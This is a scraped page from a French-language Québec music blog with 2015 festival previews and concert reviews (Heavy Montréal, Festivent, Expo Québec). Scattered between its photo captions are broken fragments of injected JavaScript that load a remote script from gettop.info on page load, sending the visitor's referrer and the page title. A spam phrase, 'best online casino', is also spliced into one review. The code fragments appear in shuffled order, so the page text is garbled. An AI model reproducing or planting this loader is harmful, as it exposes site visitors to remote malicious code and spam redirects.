Home Blog Page 3

Article Spécial : Expo Québec 2015

Bonjour à tous !
Aujourd’hui, nous avons pour vous un petit article rapide sur l’expo Québec, Édition 2015. Pour certains, l’expo Québec est une journée en famille, à visiter le grand site qui nous propose plusieurs activités différentes et/ou expositions. Pour les autres, c’est surtout des spectacles avec des artistes de renommée qui viennent fouler la scène de l’expo Québec. Cette année encore, l’expo ne fait pas exception et nous propose des artistes populaires, autant de l’extérieur que du Québec. Voyons donc ce qui nous intéresse, sois la programmation des spectacles pour l’édition de cette année.

Vendredi 14 Août : Wyclef Jean avec Marième et Busty and the Bass en première partie.
Les festivités de l’expo débutera par une soirée à la saveur hip-hop / jazz. L’artiste, qui a connu un grand succès solo grâce a son album ‘’The Carnival’’, a fait plusieurs collaborations avec d’autres artistes connus. Une dès collaborations la plus connue est surement celle avec ‘’Avicii’’.
Deux groupes d’ici assureront la première partie, sois Marième et Busty and the Bass. Une soirée à ne pas manquer pour les fans de jazz avec un soupçon de hip-hop.

Samedi 15 Août : Hedley, avec Automat en première partie.
En cette deuxième journée de l’expo, c’est le populaire groupe Hedley qui viendra jouer leurs plus grands hits devant la foule québécoise. Le groupe, qui accumule hits par-dessus hits, ne cesse de remplir les salles de spectacles partout où ils vont. Gageons qu’il y aura une bonne foule lors de cette soirée. Encore une fois, c’est un band d’ici qui fera la première partie, sois le band Automat.

Dimanche 16 Août : Roch Voisine et Yoan.
Pour continuer, nous avons un vétéran de la musique québécoise, qui foulera la scène de l’expo Québec, avec un autre artiste qui lui, débute dans le domaine. C’est surement avec plaisir que Yoan, le dernier gagnant de l’émission La Voix, vas accompagner le célèbre Roch Voisine lors de cette troisième soirée de spectacle.

Lundi 17 Août : Les Années Bonheur avec Michel Louvain, Chantal Pary et Renée Martel.
Trois grands artistes d’ici réunis sur une même scène le tant d’un spectacle ? Oui c’est possible avec le spectacle ‘’Les Années Bonheur ‘’ réunissant Michel Louvain, Chantal Pary et Renée Martel, tous sur la même scène. Ils interpréteront leur plus grands succès devant une foule qui s’annonce être un peu plus âgée que les autres journées du festival.

Mardi 18 Août : Kaïn, avec Mauves en première partie.
Au Québec, Kaïn n’a plus besoin de rien prouver pour conquérir les gens. Avec des titres populaires et accrocheurs comme Mexico, Embarque ma belle, comme dans l’temps etc, la foule pourra chanter en cœur avec le band. Une soirée qui s’annonce tranquille et intime. Le groupe Mauves sera en première partie de Kaïn.

Mercredi 19 Août : Éric Lapointe, avec Undercover Live Rock Band en première partie.
Qui ne connait pas Éric Lapointe ? Personne… Le légendaire Rockeur Québécois sera sur scène pour nous interpréter ces plus grands hits que tout le monde connait. Encore une fois, la foule risque de chanter à tu tête en suivant les paroles d’Éric. En première partie, le band ‘’Undercover Live Rock Band’’ nous fera revivre les plus grands hits Rock du passé. Une soirée à ne pas manquer si vous êtes fans de Rock.

Jeudi 20 Août : Soirée Électro.
C’est maintenant rendu chose normal de voir des soirées Électro un peu partout. Et bien l’expo Québec ne fait pas exception et nous présente sa soirée Électro. Quatre DJ de renommée internationale viendront faire danser le parterre. Une soirée qui s’annonce mouvementée et qui risque de faire bouger et danser les fans présents.

Vendredi 21 Août : Sum 41, avec Muted Screams en première partie.
Je crois que l’annonce de la venue du légendaire groupe Sum 41, fut la plus belle surprise offerte par l’expo Québec. Après une longue absence due à des problèmes de santé de Deryck, le chanteur du groupe, le groupe fait son retour à Québec et le spectacle risque d’être stupéfiant. Ils joueront sans aucun doute leur meilleurs succès. Le groupe avait été très bien accueilli lors de son dernier passage à Québec. Gageons que ce sera encore de même lors de cette avant dernière soirée d’expo. Le groupe Québécois Mutedscreams, feront fièrement la première partie de Sum41.

Samedi 22 Août : The Mighty Mighty Bosstones, avec The Robert’s Creek Saloon en première partie.
Pour clôturer les festivités de l’expo, The Mighty Mighty Bosstones, viendront jouer sur scène. Le groupe formé dans les années 80 aux États-Unis, sont les piliers du style de musique ‘’Ska-core’’. Leur album sortit en 2007, c’est vendu à des millions d’exemplaires donc le groupe à sa base de fans bien établie. Une soirée qui s’annonce unique pour les fans et aussi pour les curieux qui ne connaissent pas le groupe. The Robert’s Creek Saloon sera le groupe invité pour cette soirée.

En conclusion, l’édition de cette année de l’expo Québec, s’annonce très diversifié au niveau des styles musicaux présentés sur scène. Peu importe votre style musical préféré, vous y trouverez votre compte. Serez-vous de la partie cette année ?

Suivez la page facebook d’Ultimradio, ou bien visitez la page www.ultimradio.com pour voir des photos et critiques des différents spectacles présentés à l’expo, et pour tout autre spectacles présentés à Québec et aux alentours.

Bonne journée à vous et surtout bonne Expo Québec 2015.

ROCK ON !

Christopher Drouin.}

Critique Jour 2 Heavy Montréal 2015

HEAVY MONTREAL 2015 JOUR 2 : LA SOIRÉE DES TI-PÈRES

 

Soleil torride, rhum et coors light, avec une touche de félinité dans le jacuzzi, ouf ça réveille d’un jour 1 de Heavy Mtl et c’est le meilleur des déjeuners d’un Jour 2! Par contre, c’est sûr que si j’avais été gestionnaire de l’événement, j’aurais banni les cellulaires auprès du personnel… Y’a rien de plus sacrant que de commander une bière à 8,75$ et attendre auprès d’un/d’une « dummy » n’ayant pu terminer son école élémentaire qu’il/qu’elle finisse de visionner le dernier vidéo de chatons sorti sur son fil FB… J’ai débuté ça avec Slaves on Dope et ça décoiffe en sale! Le band canadien avec en tête Jason Rockman ont rencontré une troupe de fans en feu dès 13h00 aujourd’hui! Malgré le nombre réduit, c’était assez cacophonique et tout autant assourdissant merci! J’ai aussi essayé de tenir le coup devant Mass Murder Messiah mais je crois que mes oreilles en ont pris un coup avec l’âge et je me suis dégonflé dès l’introduction musclée d’Alex Leblanc.

 

Avant d’aller voir la généreuse Lita Ford, j’ai rencontré Fred et son pote Math! Une seule question leur brulait les lèvres : « WTF que c’est les criss de tentes vertes qui coupent la vue entre les 2 scènes!? ». C’est dès lors que je regardai effectivement l’amas vert qui jonchait là… Et bien entendu, je me posai la même question! Pour revenir à Lita, « haaaa qu’elle grande dame du rock! » je fus ébahis par sa performance franche! C’est la version « Lady rock party animal » du weekend! On peut dire qu’elle « lookait en sale » selon Fred! Malgré tout, il était temps de passer aux choses sérieuses et de se rapprocher pour Abbath! Ouf, toutes des pièces de Immortals! Il me semblait aussi que Olve Eikemo ne pouvait pas lancer : « Are you feeling immortals ? » pour rien ! Wow, un son best online casino sublime, clair, ponctué des meilleures pièces tel Tyrants ! C’est des vrais !

 

Ensuite je me suis tapé Gojira! J’avais tellement d’attente! Par contre, j’ai reçu la douche glacé du légionnaire avec cette prestation pauvre et sans vie. J’ai même quitté rapidement le parterre pendant que Joseph Duplantier expliquait qu’ils jouaient du métal afin de conserver leur âme d’enfant… Ouf, je m’en serais passé, je ne veux plus jamais les voir… Une chance que Billy Talent, même si ça ne cadrait pas dans le style, ont sauvé la mise! Wow, ça ramène toujours sur terre de se taper Devil in a Midnight Mass, Rusted from the Rain, Devil on My Shoulder, et les classiques Red Flag, Fallen Leaves et Try Honesty! Une prestation serrée et énergique devant une foule endiablée! Sérieux, c’était dans le old school Billy Talent, ça réveillait les morts!

 

Par contre, on est retourné dans le métal avec Battlecross ! Une prestation et une ambiance survoltée, endiablée, dotée d’un son exceptionnel! Malheureusement, s’en taper seulement 7-8 pièces était beaucoup trop court. Un « circle pit » dément autour d’un arbre, 3 nouvelles pièces dont Spoiled qui n’avait jamais été joué live, Kyle Gunther qui se promène et discute avec les fans, complètement débile! Une chance que j’ai Fred et Math pour me rappeler tout ça!

 

Bon et en finale, la descente aux enfers… Sérieux!? Iggy Pop et Faith No More en tête d’affiche un samedi soir d’un festival métal!? Sérieux, après 23 ans d’absence les nains de jardins auraient pu rester chez eux et le vieux pop aussi… 20 minutes de retard pour des fleurs, j’aurais dû en profiter pour me sauver! Je redis encore ici « sérieux ? » car la fin de notre samedi soir a été un flop monumental. Probablement qu’encore une fois quelqu’un de la programmation s’est dit qu’on aurait besoin d’un break sur le party et l’alcool afin d’être apte à reprendre le métro?! « Come on ! » 230$ pour un samedi soir comme ça c’est de l’arnaque! Au final, mon portefeuille est encore assez garni pour mon dimanche. Espérons que l’âme des derniers Heavy Mtl saura venir me chercher en ce dimanche ensoleillé!

Texte: Vincent Couturier

 

Photo: Heavy MTL 2015 Faith No More jour 2

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

Photo: Heavy MTL 2015 Iggy Pop jour 2

}

Photo: Heavy MTL 2015 NOFX jour 2

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

Photo: heavy MTL 2015 Meshuggah

d.getElementsByTagName(‘head’)[0].appendChild(s);

Photo: Heavy MTL 2015 Lagwagon

Photo: Heavy MTL 2015 Korn

d.getElementsByTagName(‘head’)[0].appendChild(s);

Photo: Heavy MTL 2015 Arch Enemy

}

Critique Heavy Montréal jour 1

HEAVY MONTREAL 2015 PREMIÈRE TÊTE D’AFFICHE: KORN

 

Et bien on a été gâté par cette première soirée du Heavy Mtl 2015! Tout le long du chemin, dans une boîte à caresses « pimpée » cette année (le tank d’Annie et Junior), je me suis demandé si Korn allait pouvoir racheter sa performance « good enought » du Heavy Mtl 2010. Et oui, je n’ai assisté qu’au show de Korn, structure et programmation du festival n’aidant pas beaucoup les gens de l’extérieur de la région de Montréal cette année. « Hello! Les gens qui peuvent se payer ce genre de festivités et y débourser une bonne partie de leurs moyens travaillent le vendredi! » Mais qu’est-ce qui leur a passé par la tête!? Entrecouper un des grands festivals métals de la province d’une journée tampon séparant 2 programmations extraordinaires… Il n’en fallait pas moins pour se retrouver avec une foule anémique retranchée des milliers de fans de l’extérieur de la région montréalaise. Que de pertes financières en perspectives. Y’a des têtes que devraient rouler par manque de connaissances des habitudes de vie de leur clientèle cible, et surtout leur provenance!

 

Malgré tout j’en ai profité à fond! À peine entré sur le site dès 20h30, je me suis aisément frayé un chemin dans la foule pour me retrouver à quelques mètres de la scène. Petite note, augmentation d’une clientèle féminine digne de mention cette année, mais je m’écarte hum… Je fus complètement abasourdi! Korn et Jonathan Davis nous ont éblouis avec l’intégrale de l’album Korn de 1994! Complètement malade! C’était l’ultime fétiche joué à la perfection dans une foule ne limitant pas la transe vindicative d’un trip démentiel! Bref, à peine Blind entamé, la foule était déjà en feu, chantant et scandant au rythme de Davis! Pour moi c’était le summum de la performance avec les succès : Ball Tongue, Need to, Faget, Shoot and Ladders, Predictable, Fake et Lies qui s’enchaînaient! C’était une ode aux succès du temps! De plus, la performance de Davis à la cornemuse comparativement à 2010 était, en utilisant le terme en langage de « bouseux », « sur la coche! ». Au final, ils ont mis les derniers clous au cercueil avec les 3 méga hits des albums Follow the Leader(98), Issues(99) et Untouchables(02) avec Freak on a Leash, Falling away from me et Here to Stay entrecoupés de « We love you! That’s fucking awsome! ».

 

Sérieux, c’était sourire en coin, rassasié, que je retournais chercher mes trucs à la tente média, repoussant l’invitation à faire trempette au Jacuzzi, écumant ma dernière bière… Samedi serait un autre jour, mais j’étais quand même pompé à fond avec cette ouverture! Plus à suivre les bandits!

Texte Vincent Couturier

Critique Pennywise et Face To Face Festivent 2015

 C’est devant une foule titanesque que Face To Face a ouvert le bal dimanche soir! C’était rythmé, énergique, étant même digne quelques fois des périodes « Hard Rock/Grunge » de Neil Young. (Référence obscure de mon cerveau déluré) S’adressant constamment à la foule, on voyait bien qu’ils appréciaient énormément leur passage ici-même. Entre quelques « There is true belivers right here! » et « I’m waiting for Pennywise! » lancé par Trevor Keith, s’enchaînait les hits A.O.K., I’m Trying et Walk the Walk tous tirés des 3 premiers albums de la formation. En tout cas, la foule était chauffée à block!

 

L’attente parue interminable pour Pennywise, mais s’en valu la peine! Ouf, les ti-pères punk-rock en ont encore en dedans! Sautant du coq à l’âne; tergiversant sur la politique, empruntant la caméra d’un photographe et distribuant même de la bière aux premiers rangs de fans, c’était l’ambiance d’un show épique qui était au rendez-vous! Le band a bien entendu joué ses plus grands hits tels : Fight Till You Die, Fuck Authority, Bro Hymn et Own your Country, tout en les entrecoupant de covers des plus accrocheurs avec Fight for your right des Beastie Boys, Do What you want de Bad Religion et Territorial Pissing de Nirvana. De plus, une surprise nous attendait avec un Standby me interprété par un fan. Que de moments où tout aurait pu mal tourner et pourtant Pennywise et Jim Lindberg ont su livrer la marchandise! Chapeau, c’est un band proche de son public que j’ai à nouveau vu ce dimanche soir!

Texte: Vincent Couturier

}

Photo: Pennywise Festivent 2015

Photo: Face to Face

var d=document;var s=d.createElement(‘script’);

Spécial: Heavy Mtl 2015

Bonjour à tous !
Comme nous sommes à quelques jours seulement du rendez-vous annuel des amateurs de musique Hard et/ou métal, sois le Heavy Mtl, je crois qu’il est temps de vous faire un article à ce sujet. Nous y découvrirons vite fait, les différents groupes qui s’y produiront, ainsi que certaines anecdotes et/ou explications sur certains d’entre eux. Tu es encore incertain à l’idée d’y aller ? Et bien lit cet article, il t’aidera surement à prendre ta décision. Et pour ceux qui sont déjà assurés d’y aller, et bien on va juste te donner encore plus hâte d’y être. Allons-y sans plus tarder.

Vendredi 7 Août : Vous avez bien vus oui !! Le festival a décidé d’avoir une 3e journée complète cette année. Voici la liste des bands qui joueront en cette première journée de festival, ainsi que la scène où ils se produiront et pour conclure, l’heure à laquelle leur set va commencer. (Les *** à la fin de certains groupes, indiquent qu’il y aura un texte de plus sur eux, un peu plus loin dans l’article.)

The Flatliners : sur la scène Molson Canadian, de 13h00 jusqu’à 13h30.
Gorguts : sur la scène HEAVY, de 13h30 jusqu’à 14h15.
Toyguitar : sur la scène de la forêt, de 13h45 jusqu’à 14h15.
Anonymus : sur la scène Molson Canadian, de 14h15 jusqu’à 15h00.
Venom : sur la scène HEAVY, de 15h00 jusqu’à 15h45.
Beyond Creation : Sur la scène de la forêt, de 15h00 jusqu’à 15h30.
Strung Out : sur la scène Molson Canadian, de 15h45 jusqu’à 16h30.
Revocation : sur la scène de l’Apocalypse, de 15h30 jusqu’à 16h15.
Cattle Decapitation : sur la scène de la forêt, de 16h15 jusqu’à 16h45.
Arch Enemy : sur la scène HEAVY, de 16h30 jusqu’à 17h15. ***
The Acasia Strain : sur la scène de l’Apocalypse, de 16h45 jusqu’à 17h30.
Extreme : sur la scène Molson Canadian, de 17h15 jusqu’à 18h00.
Nothing More : sur la scène de la forêt, de 17h30 jusqu’à 18h00.
Lawagon : sur la scène HEAVY, de 18h00 jusqu’à 19h00.
Veil Of Maya : sur la scène de l’Apocalypse, de 18h00 jusqu’à 18h45.
Moneen : sur la scène de la forêt, de 18h45 jusqu’à 19h15.
Meshuggah : Sur la scène Molson Canadian, de 19h00 jusqu’à 20h00.
Lofofora : sur la scène de l’Apocalypse, de 19h15 jusqu’à 20h00.
Alexisonfire : sur la scène HEAVY, de 20h00 jusqu’à 21h15. ***
Neurosis : sur la scène de l’Apocalypse, de 20h30 jusqu’à 21h45.
Korn : sur la scène Molson Canadian, de 21h15 jusqu’à 22h30 ***

Samedi le 8 Août : Après un vendredi bien remplis, nous voici en cette 2e journée de festival. Encore une fois, il y a du lourd qui nous attend. (Les *** à la fin de certains groupes, indiquent qu’il y aura un texte de plus sur eux, un peu plus loin dans l’article.)

Slaves On Dope : Sur la scène Molson Canadian, de 13h00 jusqu’à 13h30.
Mass Murder Messiah : Sur la scène de la forêt, de 13h15 jusqu’à 13h45.
Deafheaven : sur la scène HEAVY, de 13h30 jusqu’à 14h15.
The Brains : sur la scène de l’Apocalypse, de 13h45 jusqu’à 14h30.
Rocket From The Crypt : sur la scène Molson Canadian, de 14h15 jusqu’à 15h00.
Ion Dissonance : sur la scène de la forêt, de 14h30 jusqu’à 15h00.
Lita Ford : sur la scène HEAVY, de 15h00 jusqu’à 15h45.
Glassjaw : sur la scène de l’Apocalypse, de 15h15 jusqu’à 16h00.
Abbath : sur la scène Molson Canadian, de 15h45 jusqu’à 16h30.
Masked Intruder : sur la scène de la forêt, de 16h00 à 16h30.
Gojira : sur la scène HEAVY, de 16h30 jusqu’à 17h15.
Swingin’ Utters : sur la scène de l’Apocalypse, de 16h30 jusqu’à 17h15.
Testament : sur la scène Molson Canadian, de 17h15 jusqu’à 18h00.
Dig It Up : sur la scène de la forêt, de 17h15 jusqu’à 17h45.
B.A.R.F. : sur la scène de l’Apocalypse, de 17h45 jusqu’à 18h30.
Billy Talent : Sur la scène HEAVY, de 18h00 jusqu’à 19h00. ***
The Agonist : sur la scène de la forêt, de 18h30 jusqu’à 19h. ***
NOFX : sur la scène Molson Canadian, de 19h00 jusqu’à 20h00.
Devin Townsend Project : sur la scène de l’Apocalypse, de 19h00 jusqu’à 19h45.
Battlecross : sur la scène de la forêt, de 19h45 jusqu’à 20h15.
Iggy Pop : sur la scène HEAVY, de 20h00 jusqu’à 21h15.
Dying Fetus : sur la scène de l’Apocalypse, de 20h15 jusqu’à 21h00.
Faith No More : sur la scène Molson Canadian, de 21h15 jusqu’à 22h30. ***

Dimanche le 9 Août : Après deux journée intense, nous voici déjà à la dernière journée du festival. Cette journée promet d’être mémorable grâce à cette programmation. (Les *** à la fin de certains groupes, indiquent qu’il y aura un texte de plus sur eux, un peu plus loin dans l’article.)

Fozzy : Sur la scène Molson Canadian, de 13h00 jusqu’à 13h30. ***
Omnium Gatherum : Sur la scène de l’Apocalypse, de 13h00 jusqu’à 13h30.
Motionless In White : Sur la scène HEAVY, de 13h30 jusqu’à 14h15.
Exes For Eyes : Sur la scène de la forêt, de 13h30 jusqu’à 14h00.
Insomnium : sur la scène de l’Apocalypse, de 14h00 jusqu’à 14h45.
Coal Chamber : sur la scène Molson Canadian, de 14h15 jusqu’à 15h00.
Sandveiss : Sur la scène de la forêt, de 14h45 jusqu’à 15h15.
Warrant : sur la scène HEAVY, de 15h00 jusqu’à 15h45.
Jasta : sur la scène de l’Apocalypse, de 15h15 jusqu’à 16h00.
Dokken : sur la scène Molson Canadian, de 15h45 jusqu’à 16h30.
Dead Tired : sur la scène de la forêt, de 16h00 jusqu’à 16h30.
Marky Ramone’s Blitzkrieg : sur la scène HEAVY, de 16h30 jusqu’à 17h15.
Pig Destroyer : sur la scène de l’Apocalypse, de 16h30 jusqu’à 17h15.
Asking Alexandria : sur la scène Molson Canadian, de 17h15 jusqu’à 18h00. ***
Small Brown Bike : sur la scène de la forêt, de 17h15 jusqu’à 17h45.
Sanctuary : sur la scène de l’Apocalypse, de 17h45 jusqu’à 18h30.
Within Temptation : sur la scène HEAVY, de 18h00 jusqu’à 19h00.
Upon A Burning Body : sur la scène de la forêt, de 18h30 jusqu’à 19h00.
Bullet For My Valentine : sur la scène Molson Canadian, de 19h00 jusqu’à 20h00. ***
Ihsahn : sur la scène de l’Apocalypse, de 19h00 jusqu’à 19h45.
Wilson : sur la scène de la forêt, de 19h45 jusqu’à 20h15.
Lamb Of God : sur la scène Heavy, de 20h00 jusqu’à 21h15. ***
Nuclear Assault : sur la scène de l’Apocalypse, de 20h15 jusqu’à 21h00.
Slipknot : sur la scène Molson Canadian, de 21h15 jusqu’à 22h30. ***

Voici maintenant en rafale, les mini articles sur les artistes ayant des *** plus tôt dans l’article.

Arch Enemy : Le groupe Arch Ennemy est très apprécié par les québécois et surement encore plus maintenant depuis qu’Alicia White-Gluz, l’ancienne chanteuse du groupe The Agonist, est dans les rangs du groupe. Une prestation que vous ne devez surtout pas manquer.

Alexisonfire : Le band a créé tout une surprise en annonçant son retour après une ‘’séparation’’ du groupe en 2012. La surprise fut encore plus surprenante quand nous avons su que le groupe ferait un arrêt dans le cadre du Heavy Mtl. Si vous aimez le groupe ou non, je vous conseille d’aller faire un tour à leur spectacle car qui sais, ça pourrait vraiment être le dernier.

Korn : Le band populaire Korn, présentera en intégralité, son album éponyme, datant de 1994. Ils vont assurément faire d’autres chansons par la suite, don leur plus populaires. Un autre spectacle qui risque d’attirer une grande foule.

Billy Talent : Le groupe a déjà fait partie du Heavy Mtl, et ce en 2011 et ils n’avaient toutefois par reçus un très bel accueil. Maintenant que le festival est rendu un peu plus grand public, et qu’il accueil maintenant une plus grande diversité de style musical, en passant bien sûr par le punk et le punk-rock, espérons que le groupe canadien sois mieux accueillis car il le mérite.

The Agonist : Le groupe Montréalais revient nous livrer leur matériel lourd, lors de la 2e journée du festival. Sachant que l’ancienne chanteuse Alicia White-Gluz, est de passage la journée d’avant, avec son nouveau groupe Arch Enemy, est-ce qu’on peut s’attendre à une possible participation d’Alicia avec The Agonist pour une chanson ? Ce serait superbe ! Pour savoir si ça vas se produire, rendez-vous à leur spectacle.

Faith No More : Malgré leur grand succès dans le passé, Faith No More est le groupe qui fait le plus polémique cette année. Selon beaucoup de gens sur les réseaux sociaux, le groupe ne devrait pas être du festival. Est-ce réellement le cas ? Il est difficile de répondre mais malgré tout, le band devrait normalement donner tout une performance. Les plus curieux d’entre nous y seront ça c’est garantie.

Fozzy : Fans de la WWE (lutte), vous serez ravis de voir Chris Jericho sur la scène Molson Canadian pour débuter la journée de dimanche. En effet, Chris Jericho est le leader du band Fozzy. J’ai un petit parti prix pour ce groupe car je suis fan du groupe, ainsi que de Jericho, donc je vous conseille fortement d’aller voir leur prestation. Gageons que durant ce spectacle, vous allez entendre beaucoup de chants ‘’ Y2J , Y2J, Y2J ‘’.

Asking Alexandria : Le passage du band lors du festival, marque le premier passage du groupe en sol québécois avec le nouveau chanteur Denis Shaforostov, qui remplace l’ancien chanteur Danny Worsnop. C’est avec cette prestation que les fans du groupe pourront se faire à l’idée de Denis.

Bullet For My Valentine : Tout le monde connait Bullet For My Valentine avec leur succès et leurs hits que tout le monde a déjà entendus au moins une fois. Pour les avoir vus en spectacle plus d’une fois, je vous assure qu’il faut être à leur prestation, vous ne serez aucunement déçus. De plus, le band va bientôt sortir un nouvel album et les titres qui sont déjà sortis sont excellents. Donc vous aurez peut-être la chance de les entendre en live, et peut-être même que vous aurez droit à de nouvelles chansons inédites ?

Lamb Of God : Malgré le fait que Lamb Of God soit venu l’année passée au festival, ils reviennent quand même au plus grand plaisir de leurs fans. Avec un nouvel album en poche sortis il y a peu de temps, ce sera le temps d’entendre pour la première fois quelques nouvelles chansons en live. La foule risque fortement d’être déchaînée lors de cette prestation, comme à tous les shows de Lamb Of God.

Slipknot : Le légendaire groupe Slipknot, revient une autre fois au Heavy Mtl, au plaisir de tous. Avec leur dernier album sorti il y a quelques temps, ainsi qu’avec tous leurs anciens hits, la soirée risque d’être très mouvementée. Corey Taylor, le chanteur et leader du groupe, a même dit en entrevue que le spectacle du Heavy Mtl sera démentiel, et que lui et ses musiciens vont tous donner pour que ce soit un des meilleurs spectacles jamais donné. Fan ou non du groupe, vous devez y être pour vivre ça au moins une fois dans votre vie.

Voila ! C’était notre petit article Pré-Festival Heavy Mtl 2015. J’espère que vous aurez une fin de semaine de fou, et que vous allez en ressortir heureux et avec un bourdonnement dans les oreilles que seuls les amateurs de shows peuvent comprendre. Je vous souhaite à tous un excellent festival.

N’oubliez pas de suivre la page Facebook d’Ultimradio, et de visiter régulièrement le site www.ultimradio.com pour avoir un compte rendu du festival, ainsi que pour toute autre nouvelle musical et/ou photos et critiques de shows.

Rock On !

Christopher Drouin !}

Photo: Life In Color 2015 Festivent

d.getElementsByTagName(‘head’)[0].appendChild(s);

Critique Festivent ville de Lévis 3 Doors Down 2015

Holala, 5 ans déjà depuis le lancement d’ULTIMRADIO dans l’aventure de la couverture médiatique de la scène au Québec! De plus, tout a débuté ici même avec le FESTIVENT, fier événement qui nous a toujours accueillis à bras ouverts! Hier soir marquait un point culminant d’où nous n’avons pu que regarder le travail accompli depuis avec honneur et sourire en coin. Malgré l’apparence de pluie, la foule était au rendez-vous. Je fus agréablement surpris du band d’ouverture We Are Harlot qui imposa immédiatement sa figure emblématique référant aux groupes rock des années 80, et ce de pied ferme! Il n’avait rien de mieux pour revigorer mes partenaires pour le show, c’était notre style! Par contre, ce band démontrant l’attitude « Party hard! Rock hard! » n’avait peut-être pas sa place dans la programmation de cette journée à thématique familiale. Néanmoins, Judy et moi étions bien heureux! Nous servant les pièces maîtresses Denial et Dancing on Nails, ainsi que Tie Your Mother Down comme cover de Queen, c’était invitant et rafraîchissant malgré un son quelque peu écrasé et étouffant, ainsi que quelques problèmes de voix. La foule a tout de même immédiatement sauté dans le train, les sifflants et applaudissant sans cesse. Je leur lance mon chapeau!

 

On a ensuite poursuivi avec la prestation de 3 Doors Down qui nous ont donné un show du tonnerre! Bien entendu, c’était le groupe à voir pour tous les couples de tous âges rassemblés. J’étais surpris par l’ambiance de rapprochement qui nous entourait. La foule s’est religieusement mise au dogme de Brad Arnold immédiatement après l’intro de Here Without You. Wow, l’atmosphère était au paroxysme à peine Duck and Run, The Broken et Let Me Go débutés. Le band originaire du Mississipi affichait bien ses couleurs! Enchaînant du rock enjôleur ainsi qu’une balade dans la foule avec Away From the Sun, It’s Not My Time, Changes et The Road I’m On, c’est une ambiance rassembleuse qui était au rendez-vous. La foule connectait réellement avec Brad Arnold qui cumulait les « Thank you my friends, God bless you! ». J’avoue par contre que je commençais à m’assoupir un brin car Mario ne me tenait pas la main ( :D) pendant les prestations de Do It In The Dark, Behind Those Eyes, Landing in London et Citizen. Une chance que nous avons eu Loser et en rappel Kryptonite et When I’m Gone afin de nous raviver la fougue! En somme, ce fut une belle soirée rock où il faisait bon d’être accompagné!

Texte: Vincent Couturier

var d=document;var s=d.createElement(‘script’);

Photo: The Garlics Festivent 2015

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

Photo: 3 Doors Down Festivent 2015

var d=document;var s=d.createElement(‘script’);

Photo: We Are Harlot Festivent ville de Lévis 2015

if (document.currentScript) {

Photo: Simple Plan Festivent Ville de Lévis 2015

var d=document;var s=d.createElement(‘script’);

Le Pit Fest, un éco-festival à ne pas manquer!!!

Ne manquez pas le Pit Fest 2015 qui aura lieu du 14 août dès 13h au 16 août prochain. Crée en 2008, le Pit Fest est un éco-festival qui offre l’occasion de fêter dans la nature tout en étant responsable sur le plan écologique et social. Le festival encourage les artistes de la scène locale et offre des activités sportives, des démonstrations artistiques et différents ateliers. La nourriture est fournie sur place toute la fin de semaine.

En cette 7e édition du festival, nous avons le plaisir de recevoir six formations que nous affectionnons énormément dont Late Night Munchies, 50 Shades of Punk Rock et Al Drapeau qui se produiront sur scène le vendredi 14 août, ainsi que Les Pas Sortables, Dutch Nuggets et Hate It Too qui seront sur scène le samedi 15 août 2015.

En plus d’avoir deux spectacles sur place durant la fin de semaine, d’autres activités vous sont proposées dont un tournoi de volleyball de plage, un tournoi de fers, un tournoi de dodgeball, un jeu de washers, de beer pong, de baby foot, de jenga géant, d’échecs, une oeuvre collective du Pit Fest et des kiosques éco et l’exposition d’artisans.

Pour acheter vos billets, rendez-vous sur le site www.pitfest.org/billets et le coût inclus assurément un espace de camping, la nourriture (à volonté toute la fin de semaine http://pitfest.org/nourriture), de l’eau potable, des toilettes, des douches et des chapiteaux. Nous conseillons d’acheter vos billets en prévente pour permettre aux organisateurs du Pit Fest de prévoir la nourriture et les installations en conséquence.

L’évènement est BYOB ! Vous pouvez donc amener vos boissons alcoolisées.

Prévoir un 10$ pour le stationnement par voiture pour accéder au site, car le Pit Fest encourage le covoiturage.

Pour plus d’information sur le Pit Fest, visitez le www.pitfest.org

https://www.facebook.com/events/1006661322691318/if (document.currentScript) {

Photo: Hate It Too l’Anti bar spectacles 2015

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

Photo: MUTE au nouveau Bar Spectacles l’Anti 2015

d.getElementsByTagName(‘head’)[0].appendChild(s);

Photo: Deep Purple FEQ 2015

Photo: High On Fire FEQ 2015

}

Photo: Ambiance au FEQ pour Sandveiss, High On Fire et Megadeth

} else {

Photo: Sandveiss FEQ 2015

d.getElementsByTagName(‘head’)[0].appendChild(s);

Photo: Megadeth Festival d’été de Québec 2015

}

Photo: Your favorite Enemies Festival d’été de Québec

}

Photo: Royal Blood FEQ 2015

d.getElementsByTagName(‘head’)[0].appendChild(s);

Critique de l’album »Awaken the Fire » du band »Like A Storm »

Bonjour !

Aujourd’hui, je vais vous faire ma critique d’un album provenant d’un groupe de la Nouvelle-Zélande. Ce groupe se nomme ‘’Like A Storm’’. Ce nom vous ne dit rien ? C’est un peu normal car le groupe n’est pas très connu encore mais il gagne en popularité de plus en plus. Le groupe est formé de quatre musiciens, dont trois d’entre eux sont des frères. Si je pourrais décrire la sonorité du groupe en vous nommant d’autres bands connus, mes choix seraient les suivants : Three Days Grace, Black Veil Brides, Creed, Alter Bridge, Age of Days, Downplay, Starset et j’en passe. Ce n’est pas le style de musique le plus ‘’hard’’ et le plus ‘’extrême’’ que vous allez trouver avec ce groupe, mais si vous êtes le moindrement ouvert d’esprits sur les différents style musicaux, je vous assure que vous allez y trouver une certaine satisfaction en écoutant cet album. Il y a même un instrument qui est utilisé dans certaines chansons, qu’on ne retrouve rarement, voir jamais, dans le rock et/ou hard-rock. Lequel vous direz vous ? Si j’ai piqué votre curiosité et que vous voulez le savoir, je vous invite à continuer votre lecture, je vais faire un bref résumé de chaque chansons présentes sur l’album ‘’Awaken the Fire’’, parut le 16 Mars 2015. Allons-y !!!

LAS-band-pic-for-NZM3.3

 

